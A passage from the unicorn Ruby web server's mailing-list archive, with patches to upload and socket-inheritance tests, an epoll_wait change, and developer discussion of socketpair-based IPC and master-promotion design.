+		defined($opt{overwrite}) and
+			print { $c } ('x' x $opt{overwrite});
 		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
@@ -205,6 +206,27 @@ SKIP: {
 	$ck_hash->('chunked_md5', '/rack_input/size_first');
 	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
 
+	$ck_hash->('identity', '/rack_input', -s => $blob_size, sync => 1);
+	$ck_hash->('chunked_md5', '/rack_input', sync => 1);
+
+	# ensure small overwrites don't get checksummed
+	$ck_hash->('identity', '/rack_input', -s => $blob_size,
+			overwrite => 1); # one extra byte
+
+	# excessive overwrite truncated
+	$c = tcp_start($srv);
+	$c->autoflush(0);
+	print $c "PUT /rack_input HTTP/1.0\r\nContent-Length: 1\r\n\r\n";
+	if (1) {
+		local $SIG{PIPE} = 'IGNORE';
+		my $buf = "\0" x 8192;
+		my $n = 0;
+		my $end = time + 5;
+		$! = 0;
+		while (print $c $buf and time < $end) { ++$n }
+		ok($!, 'overwrite truncated') or diag "n=$n err=$! ".time;
+	}
+	undef $c;
 
 	$curl // skip 'no curl found in PATH', 1;
 
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
deleted file mode 100644
index 76e6c1c..0000000
--- a/test/unit/test_upload.rb
+++ /dev/null
@@ -1,301 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2009 Eric Wong
-require './test/test_helper'
-require 'digest/md5'
-
-include Unicorn
-
-class UploadTest < Test::Unit::TestCase
-
-  def setup
-    @addr = ENV['UNICORN_TEST_ADDR'] || '127.0.0.1'
-    @port = unused_port
-    @hdr = {'Content-Type' => 'text/plain', 'Content-Length' => '0'}
-    @bs = 4096
-    @count = 256
-    @server = nil
-
-    # we want random binary data to test 1.9 encoding-aware IO craziness
-    @random = File.open('/dev/urandom','rb')
-    @sha1 = Digest::SHA1.new
-    @sha1_app = lambda do |env|
-      input = env['rack.input']
-      resp = {}
-
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-      resp[:sha1] = @sha1.hexdigest
-
-      # rewind and read again
-      input.rewind
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-
-      if resp[:sha1] == @sha1.hexdigest
-        resp[:sysread_read_byte_match] = true
-      end
-
-      if expect_size = env['HTTP_X_EXPECT_SIZE']
-        if expect_size.to_i == input.size
-          resp[:expect_size_match] = true
-        end
-      end
-      resp[:size] = input.size
-      resp[:content_md5] = env['HTTP_CONTENT_MD5']
-
-      [ 200, @hdr.merge({'X-Resp' => resp.inspect}), [] ]
-    end
-  end
-
-  def teardown
-    redirect_test_io { @server.stop(false) } if @server
-    @random.close
-    reset_sig_handlers
-  end
-
-  def test_put
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_content_md5
-    md5 = Digest::MD5.new
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n" \
-                  "Trailer: Content-MD5\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      md5.update(buf)
-      sock.syswrite("#{'%x' % buf.size}\r\n")
-      sock.syswrite(buf << "\r\n")
-    end
-    sock.syswrite("0\r\n")
-
-    content_md5 = [ md5.digest! ].pack('m').strip.freeze
-    sock.syswrite("Content-MD5: #{content_md5}\r\n\r\n")
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-    assert_equal content_md5, resp[:content_md5]
-  end
-
-  def test_put_trickle_small
-    @count, @bs = 2, 128
-    start_server(@sha1_app)
-    assert_equal 256, length
-    sock = tcp_socket(@addr, @port)
-    hdr = "PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n"
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      hdr << buf
-      sock.syswrite(hdr)
-      hdr = ''
-      sleep 0.6
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_keepalive_truncates_small_overwrite
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    to_upload = length + 1
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{to_upload}\r\n\r\n")
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    sock.syswrite('12345') # write 4 bytes more than we expected
-    @sha1.update('1')
-
-    buf = sock.readpartial(4096)
-    while buf !~ /\r\n\r\n/
-      buf << sock.readpartial(4096)
-    end
-    read = buf.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal to_upload, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_excessive_overwrite_closed
-    tmp = Tempfile.new('overwrite_check')
-    tmp.sync = true
-    start_server(lambda { |env|
-      nr = 0
-      while buf = env['rack.input'].read(65536)
-        nr += buf.size
-      end
-      tmp.write(nr.to_s)
-      [ 200, @hdr, [] ]
-    })
-    sock = tcp_socket(@addr, @port)
-    buf = ' ' * @bs
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-
-    @count.times { sock.syswrite(buf) }
-    assert_raise(Errno::ECONNRESET, Errno::EPIPE) do
-      ::Unicorn::Const::CHUNK_SIZE.times { sock.syswrite(buf) }
-    end
-    sock.gets
-    tmp.rewind
-    assert_equal length, tmp.read.to_i
-  end
-
-  # Despite reading numerous articles and inspecting the 1.9.1-p0 C
-  # source, Eric Wong will never trust that we're always handling
-  # encoding-aware IO objects correctly.  Thus this test uses shell
-  # utilities that should always operate on files/sockets on a
-  # byte-level.
-  def test_uncomfortable_with_onenine_encodings
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-  end
-
-  def test_chunked_upload_via_curl
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    cmd = "curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-           -isSf --no-buffer -T- " \
-          "http://#@addr:#@port/"
-    resp = Tempfile.new('resp')
-    resp.sync = true
-
-    rd, wr = IO.pipe.each do |io|
-      io.sync = io.close_on_exec = true
-    end
-    pid = spawn(*cmd, { 0 => rd, 1 => resp })
-    rd.close
-
-    tmp.rewind
-    @count.times { |i|
-      wr.write(tmp.read(@bs))
-      sleep(rand / 10) if 0 == i % 8
-    }
-    wr.close
-    pid, status = Process.waitpid2(pid)
-
-    resp.rewind
-    resp = resp.read
-    assert status.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  def test_curl_chunked_small
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-            -isSf --no-buffer -T- http://#@addr:#@port/ < #{tmp.path}`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  private
-
-  def length
-    @bs * @count
-  end
-
-  def start_server(app)
-    redirect_test_io do
-      @server = HttpServer.new(app, :listeners => [ "#{@addr}:#{@port}" ] )
-      @server.start
-    end
-  end
-
-end

[-- Attachment #23: 0022-drop-redundant-IO-close_on_exec-false-calls.patch --]
[-- Type: text/x-diff, Size: 891 bytes --]

From 841b9e756beb1aa00d0f89097a808adcbbf45397 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:51 +0000
Subject: [PATCH 22/23] drop redundant IO#close_on_exec=false calls

Passing the `{ FD => IO }' mapping to #spawn or #exec already
ensures Ruby will clear FD_CLOEXEC on these FDs before execve(2).
---
 lib/unicorn/http_server.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 348e745..dd92b38 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -472,10 +472,7 @@ def worker_spawn(worker)
 
   def listener_sockets
     listener_fds = {}
-    LISTENERS.each do |sock|
-      sock.close_on_exec = false
-      listener_fds[sock.fileno] = sock
-    end
+    LISTENERS.each { |sock| listener_fds[sock.fileno] = sock }
     listener_fds
   end
 

[-- Attachment #24: 0023-LISTEN_FDS-inherited-sockets-are-immortal-across-SIG.patch --]
[-- Type: text/x-diff, Size: 3229 bytes --]

From 6ff8785c9277c5978e6dc01cb1b3da25d6bae2db Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:52 +0000
Subject: [PATCH 23/23] LISTEN_FDS-inherited sockets are immortal across SIGHUP

When using systemd-style socket activation, consider the
inherited socket immortal and do not drop it on SIGHUP.
This means configs w/o any `listen' directives at all can
continue to work after SIGHUP.

I only noticed this while writing some tests in Perl 5 and
the test suite is two lines shorter to test this feature :>
---
 lib/unicorn/http_server.rb  | 7 ++++++-
 t/client_body_buffer_size.t | 1 -
 t/integration.t             | 1 -
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index dd92b38..f1b4a54 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -77,6 +77,7 @@ def initialize(app, options = {})
     options[:use_defaults] = true
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
+    @immortal = [] # immortal inherited sockets from systemd
 
     # We use @self_pipe differently in the master and worker processes:
     #
@@ -158,6 +159,7 @@ def listeners=(listeners)
     end
     set_names = listener_names(listeners)
     dead_names.concat(cur_names - set_names).uniq!
+    dead_names -= @immortal.map { |io| sock_name(io) }
 
     LISTENERS.delete_if do |io|
       if dead_names.include?(sock_name(io))
@@ -807,17 +809,20 @@ def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
+    immortal = []
 
     # emulate sd_listen_fds() for systemd
     sd_pid, sd_fds = ENV.values_at('LISTEN_PID', 'LISTEN_FDS')
     if sd_pid.to_i == $$ # n.b. $$ can never be zero
       # 3 = SD_LISTEN_FDS_START
-      inherited.concat((3...(3 + sd_fds.to_i)).to_a)
+      immortal = (3...(3 + sd_fds.to_i)).to_a
+      inherited.concat(immortal)
     end
     # to ease debugging, we will not unset LISTEN_PID and LISTEN_FDS
 
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
+      @immortal << io if immortal.include?(fd)
       io.autoclose = false
       io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index b1a99f3..3067f28 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -36,7 +36,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 seek($conf_fh, 0, SEEK_SET);
 truncate($conf_fh, 0);
 print $conf_fh <<EOM;
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 $ar->do_kill('HUP');
diff --git a/t/integration.t b/t/integration.t
index a568758..bb2ab51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -17,7 +17,6 @@ my $u1 = "$tmpdir/u1";
 print $conf_fh <<EOM;
 early_hints true
 listen "$u1"
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');

^ permalink raw reply related	[relevance 1%]

* [PATCH] epollexclusive: use maxevents=1 for epoll_wait
  @ 2023-03-28 12:24  5%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-03-28 12:24 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Interesting patch, I wonder if you have considered RB_ALLOCV_N, e.g:
> 
> https://patch-diff.githubusercontent.com/raw/Shopify/pitchfork/pull/37.patch

Were you able to benchmark an improvement using alloca?
I would think it gets lost in the noise.

I don't like alloca in general since it can make the compiler
over-allocate stack (because default cflags favors speed over
size).  It also makes static analysis more difficult.

But C Ruby is already infested with alloca, so one more/less
likely isn't meaningful.  But, maybe I have a better solution
than either alloca or malloc below.

Been busy dealing with other stuff, but something new just
occured to me based on something I've abused for over a decade.

Background:

  Outside of unicorn (and COMPLETELY different designs), I've
  abused epoll_wait with maxevents=1 for over a decade because
  it gives the most fairness in multi-threaded cases.  epoll is
  a queue, too, kqueue just got the more appropriate name.

It never occured to me until right now now, but maxevents=1
combined w/ EPOLLEXCLUSIVE should ALSO improve fairness
(compared to maxevents >1 + EPOLLEXCLUSIVE) in a multi-process,
single-threaded environment like unicorn if configured with
multiple listeners.

Explanation in the commit message and code comments below,
hopefully it makes sense.

Anybody willing to benchmark the following on a large SMP
machine?  (I hate consumerism and refuse to have powerful HW)

---------8<--------
Subject: [PATCH] epollexclusive: use maxevents=1 for epoll_wait

This allows us to avoid both malloc (slow) and alloca
(unpredictable stack usage) at the cost of needing to make more
epoll_wait syscalls in a rare case.

In unicorn (and most servers), I expect the most frequent setup
is to have one active listener serving the majority of the
connections, so the most frequent epoll_wait return value would
be 1.

Even with >1 events, any syscall overhead saved by having
epoll_wait retrieve multiple events is dwarfed by Rack app
processing overhead.

Worse yet, if a worker retrieves an event sooner than it can
process it, the kernel (regardless of EPOLLEXCLUSIVE or not) is
able to enqueue another new event to that worker.  In this
example where `a' and `b' are both listeners:

  U=userspace, K=kernel
  K: client hits `a' and `b', enqueues them both (events #1 and #2)
  U: epoll_wait(maxevents: 2) => [ a, b ]
  K: enqueues another event for `b' (event #3)
  U: process_client(a.accept) # this takes a long time

While process_client(a.accept) is happening, `b' can have two
clients pending on a given worker.  It's actually better to
leave the first `b' event unretrieved so the second `b'
event can go to the ep->rdllist of another worker.

The kernel is only capable of enqueuing an item if it hasn't
been enqueued.  Meaning, it's impossible for epoll_wait to ever
retrieve `[ b, b ]' in one call.
---
 ext/unicorn_http/epollexclusive.h | 31 +++++++++++++------------------
 1 file changed, 13 insertions(+), 18 deletions(-)

diff --git a/ext/unicorn_http/epollexclusive.h b/ext/unicorn_http/epollexclusive.h
index 677e1fe..8f4ea9a 100644
--- a/ext/unicorn_http/epollexclusive.h
+++ b/ext/unicorn_http/epollexclusive.h
@@ -64,18 +64,22 @@ static VALUE prep_readers(VALUE cls, VALUE readers)
 
 #if USE_EPOLL
 struct ep_wait {
-	struct epoll_event *events;
+	struct epoll_event event;
 	rb_io_t *fptr;
-	int maxevents;
 	int timeout_msec;
 };
 
 static void *do_wait(void *ptr) /* runs w/o GVL */
 {
 	struct ep_wait *epw = ptr;
-
-	return (void *)(long)epoll_wait(epw->fptr->fd, epw->events,
-				epw->maxevents, epw->timeout_msec);
+	/*
+	 * Linux delivers epoll events in the order received, and using
+	 * maxevents=1 ensures we pluck one item off ep->rdllist
+	 * at-a-time (c.f. fs/eventpoll.c in linux.git, it's quite
+	 * easy-to-understand for anybody familiar with Ruby C).
+	 */
+	return (void *)(long)epoll_wait(epw->fptr->fd, &epw->event, 1,
+					epw->timeout_msec);
 }
 
 /* :nodoc: */
@@ -84,14 +88,10 @@ static VALUE
 get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
 {
 	struct ep_wait epw;
-	long i, n;
-	VALUE buf;
+	long n;
 
 	Check_Type(ready, T_ARRAY);
 	Check_Type(readers, T_ARRAY);
-	epw.maxevents = RARRAY_LENINT(readers);
-	buf = rb_str_buf_new(sizeof(struct epoll_event) * epw.maxevents);
-	epw.events = (struct epoll_event *)RSTRING_PTR(buf);
 	epio = rb_io_get_io(epio);
 	GetOpenFile(epio, epw.fptr);
 
@@ -99,17 +99,12 @@ get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
 	n = (long)rb_thread_call_without_gvl(do_wait, &epw, RUBY_UBF_IO, NULL);
 	if (n < 0) {
 		if (errno != EINTR) rb_sys_fail("epoll_wait");
-		n = 0;
-	}
-	/* Linux delivers events in order received */
-	for (i = 0; i < n; i++) {
-		struct epoll_event *ev = &epw.events[i];
-		VALUE obj = rb_ary_entry(readers, ev->data.u64);
+	} else if (n > 0) { /* maxevents is hardcoded to 1 */
+		VALUE obj = rb_ary_entry(readers, epw.event.data.u64);
 
 		if (RTEST(obj))
 			rb_ary_push(ready, obj);
-	}
-	rb_str_resize(buf, 0);
+	} /* n == 0 : timeout */
 	return Qfalse;
 }
 #endif /* USE_EPOLL */

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] Make the gem usable as a git gem
  @ 2022-07-08 12:12  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08 12:12 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@gmail.com> wrote:
> Ok, so I’m sorry, but I’ve now tried for hours and
> I can’t for the life of me figure out how to send a patch
> cleanly with the tools I have available.

Ugh, I guess your employer doesn't want you fixing Linux kernel bugs,
either :<

> So you can download the patch here:
> https://github.com/byroot/unicorn/commit/e7f49852875de54cce974c7cbdd5540ddc5e4eeb.patch

OK, I suggest setting up mirrors on repo.or.cz or somewhere
else, as well, for redundancy and accessibility behind
blockades/firewalls.

> —— 
> 
> Bundler allow to install arbitrary revision
> of a gem via its git repository, e.g.
> 
> ```ruby
> gem "unicorn", git: "https://yhbt.net/unicorn.git"
> ```
> 
> But this currently doesn't work with unicorn because
> some files are not committed, and they are only generated
> by the makefile.
> 
> This change would make it much easier to test
> unreleased versions.

Understood; but I'm not in favor of having generated files in
version control due to noise from needless diffs/dirty-states.

And I just had problems in another project because of generated
hunks the other day.

I suggest pointing the gemfile towards your own repo and
rebasing this patch on top of upstream, instead.

> NB: I didn't commit ext/unicorn_http/unicorn_http.c
> because I think you might as well generate it and commit
> it yourself so that you don't have to review it.

Minor changes to the .rl files (or Ragel itself) can lead noisy
comment/whitespace changes; and a constant dirty index if two
contributors are using different revisions of Ragel[1].

I encounter constant dirty index with autotools and gnulib-using
projects across different systems, too; and it's a PITA to deal
with when trying to fix platform-specific bugs.

> --- /dev/null
> +++ b/lib/unicorn/version.rb
> @@ -0,0 +1 @@
> +Unicorn::Const::UNICORN_VERSION = '6.1.0.dirty'

That's a regression, a version based on `git describe'
can be quite informative, especially when somebody isn't
sure if they've loaded the correct version or not.



[1] on a side note, I started getting rid of the Ragel dependency
    last year (replacing with vendored picohttpparser), but got
    sidetracked with Real-Life crap which I'm still dealing with.
    The problem is Ragel 7 (experimental) won't be compatible with
    6, and FreeBSD only packages 7 while Debian-based is staying
    with 6 for now.  There were nasty incompatibilities going from
    Ragel 5->6 back in the Mongrel days, too; so I'd rather just go
    with a standalone C parser I've been abusing elsewhere.

^ permalink raw reply	[relevance 4%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
       [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
@ 2022-07-08  0:30  0%         ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08  0:30 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:

(fully quoting original message for archival purposes, original
was sent privately)

> > SIGURG is fine, having SIGUSR2 mean two things seems fragile and error-prone
> 
> Ack.
> 
> 
> > I'm fine with requiring Linux for this feature, existing
> > features need to continue working on *BSD...
> 
> Sounds good.
> 
> 
> > *_fork callbacks already work for your current patch, though, right?;
> > so hopefully *_refork won't be needed...
> 
> Yeah, I don't think it's necessary.
> 
> > sidenote: no need for kgio, I've been meaning to get rid of it
> > (Ruby 2.3+ has everything we'd need, I think...)
> 
> Yes. I just didn't want to make such change in my patch.
> I can send a patch to remove kgio and require Ruby 2.3 if you wish.

I don't think Ruby 2.3+ is even necessary, just yet, nor kgio.
None of these new code paths should be exception-intensive to be
a performance problem.

> > I would prefer this Linux-only approach if it gets rid of PID
> > files and doesn't introduce new temporary files/FIFOs.
> 
> Ack. I'll get back to that one then.
> 
> > It seems socketpair(..., SOCK_SEQPACKET) can be used for
> > packetized bidirectional IPC, perhaps with send_io + recv_io iff
> > necessary.  There shouldn't be any need for new, fragile FS
> > interactions.
> 
> Hum. I'm not familiar with socketpair, I'll have to read on it.

SOCK_SEQPACKET has worked well on Linux for ages; and seems to
work well on FreeBSD 12+, at least; but I haven't tried it on
other OSes...

socketpair itself is ancient and every *nix has it (but only
SOCK_STREAM and SOCK_DGRAM, SOCK_SEQPACKET came a bit later).

> > Another idea, have you considered letting master work on some requests?
> > Signal handling would be delayed, and EINTR handling bugs in
> > gems could be exposed, but it'd be completely portable...
> 
> I haven't considered it no, but I'm not really kin on it, because if you do
> this, requests handled by the master can't be timed out.

OK, fair enough.

> If anything, the reliable timeout is the number one reason why I still
> believe unicorn
> is the superior server out there.

/me hides under a desk :<

Honestly, you have no idea how embarrased I am of that (mis)feature.

> > It depends on whether the monitoring process/library can work
> > with other Rack servers, probably; and signal compatibility.
> 
> That's a good point. Assuming unicorn and puma both do reforking on SIGURG,
> then that monitoring process could work with both. Not a bad idea.
> 
> > >   - Many endpoints require database and other network access you probably
> > >     don't want in the master.
> >
> > Wouldn't the *_fork hooks handle that, anyways?
> 
> They are supposed to yes. But I suspect many apps currently work fine
> because some connection are lazily established on first access and just never
> accessed as part of the boot process.
> 
> Once you enable reforking, you might realized that you are missing some code
> in `before_fork`.

OK, fair enough.  I think it's simpler to tell people to improve
existing hooks than introduce new names for similar concepts
(and likely a chunk of duplicated code in their configs)

> > >   - Endpoints may have side effects.
> >
> > Yeah, this would optimize the GET endpoints, at least.
> 
> Well, `GET` endpoints may have side effects too, e.g. a visit counter.
> 
> > Nope, still wrapped.  According to the git-format-patch(1) manpage,
> > Thunderbird can work w/o extensions, actually.
> 
> Damn it, I sent that one using GMail's plain test mode.
> 
> I'm sorry but my work laptop is kinda locked down, so I'm very limited
> in my choice of mail clients. I'll try to send it from my personal computer.

OK, your initial message was from Thunderbird and probably close;
so I figure git@vger.kernel.org could use the feedback if the
git manpage has fallen out-of-date.

> Also less convenient for you, but I guess you can pull my fork:
> 
> git@github.com:casperisfine/unicorn.git
> 
> The two branches are: master-promote and worker-refork.

That would be: https://github.com/casperisfine/unicorn.git

Anonymous HTTPS is mostly fine (more steps to quote/reply to,
and inaccessible offline)

Registration is what I have major problems with.

> > I'm fine with "maintaining it" if it just means Cc-ing you on
> > bugs related to this :>
> 
> Oh that's fine, that was pretty much implied.

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
       [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
@ 2022-07-08  0:13  2%           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08  0:13 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> >> It seems socketpair(..., SOCK_SEQPACKET) can be used for
> >> packetized bidirectional IPC, perhaps with send_io + recv_io iff
> >> necessary.  There shouldn't be any need for new, fragile FS
> >> interactions.
> 
> > Hum. I'm not familiar with socketpair, I'll have to read on it.

Please keep unicorn-public@yhbt.net Cc-ed for archival purposes
in case I'm arrested/kidnapped/killed.  I'll quote and reply to
your other message separately, no need to resend.

> Could you clarify what you had in mind? Because I've read on socketpair, and
> from my understanding it's similar to anonymous pipes, as they have to
> be created prior
> to forking.

It's bidirectional, and you can use send_io/recv_io to send
pipes or any other IO objects across.  SOCK_SEQPACKET
(sequenced-packet) also frees you from having to deal with
splitting on message boundaries or interleaving.

Ruby's send_io/recv_io does have a weakness in that it can't
send a useful string buffer along with the IO object, but a little
C can be used with sendmsg/recvmsg to make it happen (but
sendmsg + send_io is probably fine)

Ruby's socket ext just sends a 1 byte dummy padding buffer, but
it can allow whatever the socket buffers can handle (over 200k,
IIRC).

This should allow the a socketpair created from a master to
communicate bidirectionally with any of its kids.

If you don't feel like writing C, it might be easier to have
two socketpairs:

1) for string buffer messages
2) another exclusively for send_io/recv_io

> So if we start forking from a worker, I don't see how the new worker and
> the master can open a line of communication without exchanging on the
> filesystem.

If you're sending one end of a pipe from the worker to master:

   m1, w1 = socketpair ...
   m2, w2 = socketpair ...

   w1.sendmsg("#$$-#{io.stat.ino}")
   w2.send_io(io)

And the master will:

   m1.recvmsg => "#{worker_pid}-#{inode}"
   m2.recv_io => map inode of received IO to worker

One major weakness of the above is the non-atomicity if a worker
dies in between w1.sendmsg and w2.send_io; the master would
be hanging on m2.recv_io.

This is why having a bit of C to bundle the IO object with
sendmsg/recvmsg in a single syscall would be nice (along with
saving 2 FDs).


Fwiw, here's the equivalent send/recv wrappers I wrote for Perl
Inline::C a while back, but it should be easy to translate into
Ruby's C API.

In case you can't infer what the Sv* functions do by name,
pretty much all the Perl C API is documented in the perlapi(1)
manpage.  Perl's API was easy enough for a doof like me to learn
after doing Ruby C for a bit...

/* allow send/recv of up to 10 IO objects at once */
#define SEND_FD_CAPA 10
#define SEND_FD_SPACE (SEND_FD_CAPA * sizeof(int))
union my_cmsg {
	struct cmsghdr hdr;
	char pad[sizeof(struct cmsghdr) + 16 + SEND_FD_SPACE];
};

static int sleep_wait(unsigned *tries, int err)
{
	const struct timespec req = { 0, 100000000 }; /* 100ms */
	switch (err) {
	case ENOBUFS: case ENOMEM: case ETOOMANYREFS:
		if (++*tries < 50) {
			fprintf(stderr, "sleeping on sendmsg: %s (#%u)\n",
				strerror(err), *tries);
			nanosleep(&req, NULL);
			return 1;
		}
	default:
		return 0;
	}
}

SV *send_foo(PerlIO *s, SV *svfds, SV *data, int flags)
{
	struct msghdr msg = { 0 };
	union my_cmsg cmsg = { 0 };
	STRLEN dlen = 0;
	struct iovec iov;
	ssize_t sent;
